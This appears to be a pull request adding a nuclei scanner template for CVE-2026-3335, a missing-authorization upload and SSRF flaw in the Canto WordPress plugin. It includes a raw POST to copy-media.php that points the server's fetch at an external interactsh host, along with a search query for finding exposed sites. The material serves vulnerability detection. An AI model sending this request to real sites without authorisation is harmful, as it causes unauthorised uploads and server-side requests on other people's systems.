### PR TITLE
Add CVE-2026-3335 Canto template

### DIFF
--- a/http/cves/2026/CVE-2026-3335.yaml
+++ b/http/cves/2026/CVE-2026-3335.yaml
@@ -1,0 +1,82 @@
+id: CVE-2026-3335
+
+info:
+  name: Canto <= 3.1.1 - Missing Authorization to Unauthenticated File Upload
+  author: iamatownboy
+  severity: medium
+  description: |
+    The Canto plugin for WordPress is vulnerable to missing authorization in the copy-media.php upload flow.
+    The file is directly accessible and accepts attacker-controlled parameters for the upload destination, allowing unauthenticated users to upload arbitrary files constrained to WordPress-allowed MIME types.
+  impact: |
+    Unauthenticated attackers can upload files into the WordPress media library and potentially abuse downstream workflows to access attacker-supplied content.
+  remediation: |
+    Update Canto to version 3.1.2 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-3335
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/0777f759-6980-4572-a866-0210bd5f5085?source=cve
+    - https://plugins.trac.wordpress.org/browser/canto/tags/3.1.1/includes/lib/copy-media.php#L71
+    - https://plugins.trac.wordpress.org/browser/canto/tags/3.1.1/includes/lib/copy-media.php#L152
+    - https://plugins.trac.wordpress.org/browser/canto/tags/3.1.1/includes/lib/copy-media.php#L306
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2026-3335
+    cwe-id: CWE-862
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: flightbycanto
+    product: canto
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/canto/"
+  tags: cve,cve2026,wordpress,wp,wp-plugin,canto,missing-auth,unauth,file-upload
+
+variables:
+  token: "{{rand_text_alpha(10)}}"
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/canto/readme.txt"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body, "Canto")
+          - compare_versions(version, "<= 3.1.1")
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - '(?i)Stable tag:\s*([0-9.]+)'
+        internal: true
+
+  - raw:
+      - |
+        POST /wp-content/plugins/canto/includes/lib/copy-media.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/
+
+        fbc_flight_domain={{token}}&fbc_app_api={{BaseURL}}&fbc_app_token={{token}}&subdomain={{token}}
+
+    matchers-condition: or
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "success"
+          - "upload"
+          - "media"
+# digest: 4a0a00473045022100b2f1aa0f5ac7ce1df7d4f7710fa4f3d2cc0cfdbbdc9f7ff2d0903f8df6a901f02205d2a8fb5e2d9fa31c1b3f6f0c0b2d5a6e0b7c1d9c4e8f2a1b3c4d5e6f708192a:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-3335.yaml
+++ b/http/cves/2026/CVE-2026-3335.yaml
@@ -7,8 +7,9 @@ info:
   description: |
     The Canto plugin for WordPress is vulnerable to missing authorization in the copy-media.php upload flow.
     The file is directly accessible and accepts attacker-controlled parameters for the upload destination, allowing unauthenticated users to upload arbitrary files constrained to WordPress-allowed MIME types.
+    The fbc_app_api parameter controls the domain WordPress fetches from via wp_safe_remote_get, enabling SSRF to attacker-controlled infrastructure.
   impact: |
-    Unauthenticated attackers can upload files into the WordPress media library and potentially abuse downstream workflows to access attacker-supplied content.
+    Unauthenticated attackers can upload files into the WordPress media library by pointing the server-side fetch at an attacker-controlled Canto API. This also enables SSRF via the fbc_app_api parameter.
   remediation: |
     Update Canto to version 3.1.2 or later.
   reference:
@@ -29,7 +30,7 @@ info:
     product: canto
     framework: wordpress
     publicwww-query: "/wp-content/plugins/canto/"
-  tags: cve,cve2026,wordpress,wp,wp-plugin,canto,missing-auth,unauth,file-upload
+  tags: cve,cve2026,wordpress,wp,wp-plugin,canto,missing-auth,unauth,file-upload,ssrf,oast
 
 variables:
   token: "{{rand_text_alpha(10)}}"
@@ -66,17 +67,23 @@ http:
         Origin: {{BaseURL}}
         Referer: {{BaseURL}}/
 
-        fbc_flight_domain={{token}}&fbc_app_api={{BaseURL}}&fbc_app_token={{token}}&subdomain={{token}}
+        fbc_id={{token}}&fbc_scheme=image&fbc_flight_domain={{token}}&fbc_app_api={{interactsh-url}}&fbc_app_token={{token}}&chromeless=1
 
-    matchers-condition: or
+    matchers-condition: and
     matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
       - type: status
         status:
           - 200
-      - type: word
+
+    extractors:
+      - type: regex
+        name: attachment
         part: body
-        words:
-          - "success"
-          - "upload"
-          - "media"
-# digest: 4a0a00473045022100b2f1aa0f5ac7ce1df7d4f7710fa4f3d2cc0cfdbbdc9f7ff2d0903f8df6a901f02205d2a8fb5e2d9fa31c1b3f6f0c0b2d5a6e0b7c1d9c4e8f2a1b3c4d5e6f708192a:922c64590222798bb761d5b6d8e72950
+        group: 1
+        regex:
+          - '"attachment_id":(\d+)'


### PR DESCRIPTION
### PR Information

This PR adds a nuclei template for CVE-2026-3335 affecting the Canto WordPress plugin.

The issue allows unauthenticated users to abuse the exposed upload flow in `copy-media.php` and submit attacker-controlled file data in vulnerable installations.

References:
- NVD
- Wordfence
- Canto plugin source code

### Template validation

- Validated with `nuclei -validate` in Docker

### Additional Details

- This PR contains a single template file only